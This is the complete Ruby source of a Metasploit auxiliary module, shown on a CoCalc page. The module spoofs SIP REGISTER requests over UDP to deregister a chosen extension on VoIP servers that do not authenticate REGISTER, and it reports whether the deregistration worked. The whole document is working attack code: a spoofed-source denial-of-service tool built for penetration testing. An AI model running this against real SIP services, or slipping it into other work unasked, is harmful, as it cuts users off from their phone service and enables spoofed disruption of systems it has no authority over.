CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/voip/sip_deregister.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Udp7include Msf::Auxiliary::Scanner89def initialize10super(11'Name' => 'SIP Deregister Extension',12'Description' => %q{13This module will attempt to deregister a SIP user from the provider. It14has been tested successfully when the sip provider/server doesn't use REGISTER15authentication.16},17'Author' => [ 'ChrisJohnRiley' ],18'License' => MSF_LICENSE19)2021deregister_udp_options22register_options(23[24Opt::RPORT(5060),25OptString.new('SRCADDR', [true, "The sip address the spoofed deregister request is coming from",'192.168.1.1']),26OptString.new('EXTENSION', [true, "The specific extension or name to target", '100']),27OptString.new('DOMAIN', [true, "Use a specific SIP domain", 'example.com'])28])29register_advanced_options(30[31OptAddress.new('SIP_PROXY_NAME', [false, "Use a specific SIP proxy", nil]),32OptPort.new('SIP_PROXY_PORT', [false, "SIP Proxy port to use", 5060])33])34end353637def setup38# throw argument error if extension or domain contain spaces39if datastore['EXTENSION'].match(/\s/)40raise ArgumentError, "EXTENSION cannot contain spaces"41elsif datastore['DOMAIN'].match(/\s/)42raise ArgumentError, "DOMAIN cannot contain spaces"43end44end4546def run_host(ip)4748begin4950src = datastore['SRCADDR']51ext = datastore['EXTENSION']52dom = datastore['DOMAIN']53sphost = datastore['SIP_PROXY_NAME']54spport = datastore['SIP_PROXY_PORT'] || 506055conn_string = "#{ext}@#{dom}"5657# set Route header if SIP_PROXY is set58if not sphost.nil? and not sphost.empty?59route = "Route: <sip:#{sphost}:#{spport};lr>\r\n"60end6162connect_udp6364print_status("Sending deregistration packet to: #{conn_string}")65print_status("Using SIP proxy #{sphost}:#{spport}") if route6667req = "REGISTER sip:#{dom} SIP/2.0" + "\r\n"68req << route if route69req << "Via: SIP/2.0/UDP #{src}" + "\r\n"70req << "Max-Forwards: 70" + "\r\n"71req << "To: \"#{ext}\"<sip:#{conn_string}>" + "\r\n"72req << "From: \"#{ext}\"<sip:#{conn_string}>" + "\r\n"73req << "Call-ID: #{(rand(100)+100)}#{ip}" + "\r\n"74req << "CSeq: 1 REGISTER" + "\r\n"75req << "Contact: *" + "\r\n"76req << "Expires: 0" + "\r\n"77req << "Content-Length: 0" + "\r\n\r\n"7879udp_sock.put(req)80response = false8182while (r = udp_sock.recvfrom(65535, 3) and r[1])83response = parse_reply(r)84end8586# print error information if no response has been received87# may be expected if spoofing the SRCADDR88print_error("No response received from remote host") if not response8990rescue Errno::EACCES91ensure92disconnect_udp93end9495end9697def parse_reply(pkt)98# parse response to check if the ext was successfully de-registered99100if(pkt[1] =~ /^::ffff:/)101pkt[1] = pkt[1].sub(/^::ffff:/, '')102end103104resp = pkt[0].split(/\s+/)[1]105rhost,rport = pkt[1], pkt[2]106107if(pkt[0] =~ /^To\:\s*(.*)$/i)108testn = "#{$1.strip}".split(';')[0]109end110111case resp.to_i112when 401113print_error("Unable to de-register #{testn} [401 Unauthorised]")114when 403115print_error("Unable to de-register #{testn} [403 Forbidden]")116when 200117print_good("#{testn} de-registered [200 OK]")118else119print_error("#{testn} : Undefined error code #{resp.to_i}")120end121122return true # set response to true123end124end125126127